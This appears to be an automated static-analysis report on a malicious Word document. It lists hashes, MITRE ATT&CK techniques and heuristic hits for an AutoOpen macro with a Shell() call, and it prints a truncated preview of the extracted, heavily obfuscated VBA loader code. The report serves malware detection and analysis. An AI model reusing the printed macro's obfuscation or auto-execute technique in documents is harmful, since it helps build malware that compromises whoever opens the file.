Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2c18a11b05ef3c16…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 82.0 KB
Created: 2017-10-16 11:13:00
Authoring application: Microsoft Office Word
First seen: 2017-10-28
MD5: 19f792c3db3c4afb275b4ba9dad24a0c
SHA-1: dd82eb798f84bd0a85da2dc7c72ea7bf751d0069
SHA-256: 2c18a11b05ef3c161f3b1da4b84d3b104353e4d83828d30620c6bfa5601346dc
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro is obfuscated but contains a Shell() call, indicating an attempt to execute arbitrary commands. This is further supported by the 'OLE_VBA_SHELL' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic firings. The macro's intent is likely to download and execute a second-stage payload.

Heuristics (7)

  • ClamAV: Doc.Macro.Obfuscation-6355576-0 (severity: critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Obfuscation-6355576-0
  • VBA macros detected (severity: medium; 3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA (severity: critical) OLE_VBA_SHELL
    The VBA macro source contains a Shell() call.
  • AutoOpen macro (severity: high) OLE_VBA_AUTOOPEN
    The document contains an AutoOpen macro, which runs automatically when the document is opened.
  • VBA p-code auto-exec with execution tokens (severity: high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (severity: medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (severity: info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10708 bytes
SHA-256: 83568b13e587622ef7c6f0d389604e8da23facd5eafcfa9e65aebf73f7e0ddd9

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Sub qZvtLQKqt()
GzYcPqUsS = "I6GHLjjqHtmadzDLztSDiTjAYQjnVpwQtJiHcWtdKzDubpHaVSuNz5SAS0VONDL7S"
ntwmCWWn = Mid(GzYcPqUsS, 4, 50)
FhvHvZfd = ntwmCWWn
cCjMpiKmwc = "IW2ANpVfJtrTBQAsDoVKkG109KMCE4BY8DE94IL3A F"
vrsptisr = Mid(cCjMpiKmwc, 6, 16)
KEmwdYYSDK = vrsptisr
itUjtA = "8QL4PSPY6LTOLR76ZEKGJBbSwOidbjWhfzHUiKztWzpPqWzfDGwRwOQsODjuLOsUuSMFhBbZEQjMMLcZRC6HFYG2A0IL7XBF7CUG8"
cmYJiT = Mid(itUjtA, 18, 64)
KRQJocO = cmYJiT
UiQkFjPv = "FCaUiEjRhPFfbFiIEUVXKrzBfYNhiEjCbKdIoYmpjuYSvvwzibIrpEPaF7T0NWVMJHPAPMI4D98P6JZ"
sNmpaH = Mid(UiQkFjPv, 2, 56)
djTci = sNmpaH
GmsvNvmmE = "ViiCjhuphVYXEvFjHHWvNssprwTiEHvvdzftSiXOoVC08SOBUXIWTM6"
nXaoD = Mid(GmsvNvmmE, 2, 40)
LaHtYawUnBO = nXaoD
FfMfoXIMjRb = "GBUEJCJMwkDhEaHrkdEMqoLnNPlaZduGQLQdkI96UES9QNR7D8YKA87"
VzScbOHzk = Mid(FfMfoXIMjRb, 6, 33)
odVmjnkEIZb = VzScbOHzk
GmQtp = "TI14M0ZQV3MMS4SI1LEMHNFtKhzlqaSVNCuvAoOoBMcEirTZUDsUiWLYSbwD5GKO4SXTWH"
MssGLBLzwsG = Mid(GmQtp, 20, 40)
VIvjVWiEWzX = MssGLBLzwsG
HEFWukt = "FXYoJrCndiDEQcaUfijoPSfGjaNzDvoNWvDDPkczhHvjsrhXHHcJJPzHZSEK6LFYJIITKIP2P1M1EZJ5MCXNPEE2"
TzhWJcN = Mid(HEFWukt, 3, 57)
ujMvYXX = TzhWJcN
SwtjKbcEm = "LB4LQ5MHKS880EYR5Z06NIHlJAHiuzsVRwVjTVwjdAptjPpZiIIRDvjTmYUHUowdRclwFJnFZjQ8J7AR9O1I0MLY9HM1"
tdpZAMriE = Mid(SwtjKbcEm, 23, 53)
ICITMV = tdpZAMriE
NHhHa = "K9TIWMPLDOFBKM0COQqjqPAUYRiWIUatMFNKBEUYN54PPDXEO"
TUIaoHWIcbP = Mid(NHhHa, 17, 16)
iHiSb = TUIaoHWIcbP
rIJLPCBsO = "" + cnVVGns + aQfpiQk + iDwHv + SizlioO + CpzGvwTa + UAiiTKD + YbTrD + MnrVqYU + ObNqp + UljHVbH + GwUtfJ + uHzCn + "com" + "ments" + cnVVGns + aQfpiQk + iDwHv + SizlioO + CpzGvwTa + UAiiTKD + YbTrD + MnrVqYU + ObNqp + UljHVbH + GwUtfJ + uHzCn + DddCNQ + PDFTNiEq + khLFWlW + iovrUU + PkDOs
nvwijwzPoHz = Left(Right((bpfPaNzVa(rIJLPCBsO)), Len((bpfPaNzVa(rIJLPCBsO))) - 5045), 31)
aLzJT = Right(Left((bpfPaNzVa(rIJLPCBsO)), 2178), 43)
LBzphcYVjTb = Right(Left((bpfPaNzVa(rIJLPCBsO)), 11850), 131)
JmRiRJQwAd = Mid((bpfPaNzVa(rIJLPCBsO)), 13024, 5)
iKhckJ = Mid((bpfPaNzVa(rIJLPCBsO)), 6858, 85)
OmlwHB = Mid((bpfPaNzVa(rIJLPCBsO)), 4789, 40)
cjUjosvn = Right(Left((bpfPaNzVa(rIJLPCBsO)), 7691), 85)
sJKBLXL = Right(Left((bpfPaNzVa(rIJLPCBsO)), 9485), 140)
SqsvK = Mid((bpfPaNzVa(rIJLPCBsO)), 3425, 144)
XWAVbQCqWRI = Left(Right((bpfPaNzVa(rIJLPCBsO)), Len((bpfPaNzVa(rIJLPCBsO))) - 14128), 101)
lOuiVRKD = Right(Left((bpfPaNzVa(rIJLPCBsO)), 6700), 144)
Okiwpijn = Left(Right((bpfPaNzVa(rIJLPCBsO)), Len((bpfPaNzVa(rIJLPCBsO))) - 3084), 139)
rUZmYnbH = Mid((bpfPaNzVa(rIJLPCBsO)), 13206, 79)
uODFRDwKZ = Left(Right((bpfPaNzVa(rIJLPCBsO)), Len((bpfPaNzVa(rIJLPCBsO))) - 14798), 85)
tKumkwRMHnd = Right(Left((bpfPaNzVa(rIJLPCBsO)), 14582), 118)
fQpHJhpDj = Right(Left((bpfPaNzVa(rIJLPCBsO)), 9330), 144)
zhZjlmZNR = Mid((bpfPaNzVa(rIJLPCBsO)), 983, 117)
KiAoqKuLrQQ = Left(Right((bpfPaNzVa(rIJLPCBsO)), Len((bpfPaNzVa(rIJLPCBsO))) - 8721), 47)
BOpArDtJ = Right(Left((bpfPaNzVa(rIJLPCBsO)), 10935), 149)
mDXkbV = Left(Right((bpfPaNzVa(rIJLPCBsO)), Len((bpfPaNzVa(rIJLPCBsO))) - 15814), 106)
hGhFKGV = Right(Left((bpfPaNzVa(rIJLPCBsO)), 10081), 66)
IXqRjMAfX = Mid((bpfPaNzVa(rIJLPCBsO)), 12184, 115)
VOioiRNk = Right(Left((bpfPaNzVa(rIJLPCBsO)), 6348), 37)
TqiAiNrv = Left(Right((bpfPaNzVa(rIJLPCBsO)), Len((bpfPaNzVa(rIJLPCBsO))) - 10279), 36)
iBXklkwDq = Mid((bpfPaNzVa(rIJLPCBsO)), 5634, 2)
DZouS = Mid((bpfPaNzVa(rIJLPCBsO)), 14601, 53)
WttkXGphMQA = Mid((bpfPaNzVa(rIJLPCBsO)), 9555, 17)
kSNuUq = Right(Left((bpfPaNzVa(rIJLPCBsO)), 13892), 100)
zUKuw = Right(Left((bpfPaNzVa(rIJLPCBsO)), 8357), 125)
RpGQpwY = Right(Left((bpfPaNzVa(rIJLPCBsO)), 9877), 78)
tdRvEYfCrO = Right(Left((bpfPaNzVa(rIJLPCBsO)), 2569), 100)
LuZbaqYYi = Left(Right((bpfPaNzVa(rIJLPCBsO)), Len((bpfPaNzVa(rIJLPCBsO))) - 10418), 99)
maQXKkJJ = Right(Lef
... (truncated)